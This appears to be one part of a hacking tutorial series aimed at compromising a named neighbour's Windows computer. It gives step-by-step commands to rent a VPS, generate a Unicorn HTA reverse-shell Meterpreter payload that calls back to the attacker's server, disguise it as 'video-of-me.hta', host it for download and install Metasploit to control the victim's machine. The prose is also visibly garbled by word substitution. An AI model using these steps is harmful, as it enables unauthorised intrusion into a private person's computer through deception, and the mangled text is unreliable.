inside previous article in This particular short series, we learned how to find our neighbor’s name using publicly accessible information along with also how to monitor device activity on their home network. With This particular information at our disposal, the idea’s time to get into installing along with also configuring the necessary tools to begin our attack on John Smith’s computer.
First, we’ll have to purchase a Virtual Private Server (VPS) inside cloud, which we’ll need to host our payload to ensure the idea can be downloaded through any computer inside entire world. Then, we’ll create our payload. In This particular case, we’re going to take advantage of HTML Applications (HTA), a lesser-known file type, along with also we’ll use of which to trick our target into opening a malicious HTA file on their computer. Last, we’ll install Metasploit, which will be used to interface with along with also control the compromised machine after our malicious HTA file is usually opened on John’s computer.
Step 1: Set Up the VPS
To secure a place for our payload on the web along with also to run the Metasploit session, we’ll need a VPS. There are many VPS providers of which will work adequately with This particular hack. Some noteworthy ones you can check out include OVH, VPSdime, VPS.net, along with also Vultr. As an example, I’ll be using DigitalOcean, although if you’re more comfortable with another VPS provider, feel free to set up a Debian or Ubuntu VPS using your preferred provider along with also skip to Step 2.
As for DigitalOcean, I recommend the $10/month plan as the cheaper option doesn’t meet the hardware requirements to run Metasploit. I encountered “cannot allocate memory” errors when using DigitalOcean’s cheapest $5/month option.
To create a DigitalOcean account, visit their signup page. Enter your email address along with also create a password. You’ll then be asked to enter billing information along with also create a “Droplet” which is usually what DigitalOcean calls cloud servers.
Droplets take only a few minutes to configure. Simply click the operating system along with also hardware specifications of your choosing, along with also DigitalOcean will create of which operating system for you. I created a Debian 9 Droplet.
Then, you’ll be asked to choose a “datacenter region.” This particular will define where inside entire world your server appears to originate through. You can choose any region you like. You’ll notice almost no latency using servers in some other regions, along with also the idea won’t affect any part of This particular hack.
Next, you can rename the Droplet to anything you like or leave the default name. Click the “Create” button to start the Droplet creation process.
Creating the Droplet can take up to 5 minutes to complete. A progress bar will be displayed while you wait, along with also an email will be sent to you containing the SSH password to your completely new VPS.
When the progress bar is usually completed, an IP address will appear insideIP Address column. This particular is usually the IP address you’ll use to connect to your VPS or “Droplet.”
To connect to your completely new DigitalOcean server, enter the below ssh command into a terminal.
If all went well, you should at This particular point have remote access to your first DigitalOcean server where we’ll host our payload along with also install Metasploit in later steps. If you experienced issues setting up your DigitalOcean account or Droplet, reference the DigitalOcean Droplet page or contact DigitalOcean for assistance. If you used a different VPS service, of course, consult their documentation for help.
There will likely be a Nginx service running on your completely new Droplet. These Nginx servers are preconfigured by DigitalOcean. This particular may conflict with later steps in This particular tutorial, so be sure to stop the running Nginx service. If you used a different VPS, you won’t have to worry about This particular (hopefully).
To stop Nginx, type the below command.
sudo systemctl stop nginx
Step 2: Create the HTA Payload
Based on the MAC addresses connecting to My-Neighbor’s wireless network, the idea’s reasonable to assume there are several internet-connected Windows devices on the target network.
To create our payload, we’ll use the Unicorn GitHub repository, which contains features of which will allow us to generate HTML Application payloads. HTA is usually a lesser-known file type along with also HTML executable file format. There’s a Great chance non-tech savvy users have never heard of the HTA file format. This particular means the idea could be easy to convince a victim into believing the idea’s a video or photo format.
with This particular tutorial, we’ll trick our victim, John Smith, into clicking on our video.hta file by telling him the idea’s a video file. When opened, the HTA file will create a reverse shell on John’s computer along with also allow us to remotely access the compromised device.
I’ll be installing along with also using Unicorn through our newly created DigitalOcean server running Debian 9 (or whatever VPS you chose). Unicorn is usually a Python script, so there are no dependencies, along with also the idea will work on any operating system where Python is usually installed.
Before we begin, make sure git is usually installed on our completely new DigitalOcean (or some other) server. We’ll need of which installed to clone the Unicorn repository. While we’re at the idea, make sure python along with also python3 are installed as well. You can install them all at once by typing the apt-get command below into your terminal.
sudo apt-get install git python python3
Next, clone the Unicorn repository by typing the below command.
git clone https://github.com/trustedsec/unicorn.git
Then, change into the unicorn directory using the cd command.
at This particular point, to generate our HTA payload, we’ll use the below command.
python unicorn.py windows/meterpreter/reverse_tcp Your-Server-IP-Address 55555 hta
- The windows/meterpreter/reverse_tcp part will instruct Unicorn to create a TCP connection through our victim’s machine. the idea’s possible to create HTTP along with also HTTPS connections although to avoid potential complications, we’ll use a simple TCP connection.
- The Your-Server-IP-Address part is usually, of course, the IP address of your DigitalOcean (or some other) server. This particular is usually the IP address our victim’s machine will connect back to when they open our HTA payload.
- 55555 is usually the port our Metasploit session will listen on along with also the port the victim machine will attempt to connect back to. This particular number can be anything between 1024–65535. the idea’s generally a bad idea to assign port numbers below 1024 as those ports are preassigned or “registered” to favorite services.
- The hta part is usually the file format we want Unicorn to generate. As mentioned previous, Unicorn supports a variety of payload types including macro, CRT, along with also DDE. To learn more about these file formats along with also how they can be used in attacks, check out the Unicorn GitHub page.
When of which’s done, Unicorn will tell us to check the “hta_attack” directory to find the files the idea generated. Change into the “hta_attack” directory with the cd command, along with also use ls to view the directory contents.
“Launcher.hta” is usually our HTA payload. We’ll need our victim to click on This particular file. Let’s rename the idea to something more appropriate for our victim. at This particular point, as we’ll see in later steps, I’m going to tell John the .hta file is usually a “video” of someone he knows, so let’s rename the idea something more convincing. Use the mv command to rename the HTA file.
mv Launcher.hta video-of-me.hta
The “index.html” is usually some HTML created by Unicorn of which we won’t need with This particular tutorial. Remove the “index.html” file with the rm command.
The “unicorn.rc” file is usually a little resource file of which will automate the Metasploit configuration. We don’t need This particular right at This particular point although keep the idea in mind as we’ll need the idea for a later step.
Last, we need the “video-of-me.hta” payload to be downloadable along with also accessible to any internet-connected device. Let’s use Python3 to create a simple server to host the file. While still inside “hta_attack” directory, type the below command to start a Python3 server.
sudo python3 -m http.server 80 &
The http.server is usually the Python3 HTTP server module we’ll be enabling with the -m argument. 80 is usually the port number the HTTP server will listen on. The & tells the terminal to execute the Python3 server as a background process. So if our SSH connection to the VPS gets interrupted or we just want to log out, the server will continue hosting our HTA payload.
We can verify our Python3 server is usually up along with also running by visiting http://Your-Server-IP-Address/video-of-me.hta through any web browser. Visiting This particular page should prompt your web browser having a “video-of-me.hta” download.
of which’s the idea for installing Unicorn along with also hosting the HTA payload. Let’s move on to installing the Metasploit Framework.
Step 3: Install Metasploit
The Metasploit developers created a simple installer script which will automate the entire installation process. To begin, download the installer script along with also save the idea to a local file. We can do This particular with the below command.
curl raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Then, ensure the file has adequate permissions to execute on your VPS using the chmod command.
sudo chmod 755 msfinstall
Last, run the newly created “msfinstall” file as root to install Metasploit.
The Metasploit installation should complete in less than 2 minutes. The installer script worked without any errors in my Debian 9 DigitalOcean Droplet. For information on installing Metasploit in some other distributions, see the official installation instructions.
Congratulations on setting everything up! In This particular part of the series, we created the VPS, generated our payload, along with also installed the Metasploit Framework. We’re almost ready to execute the attack. inside next along with also final part of This particular series, we’ll discuss how to set up a simple website to social engineer your intended victim into opening our malicious HTA payload, as well as what we can do to protect ourselves through such attacks.
Don’t Miss: How to Create Stronger Passwords
Don’t Miss: Metasploit Basics for Aspiring Hackers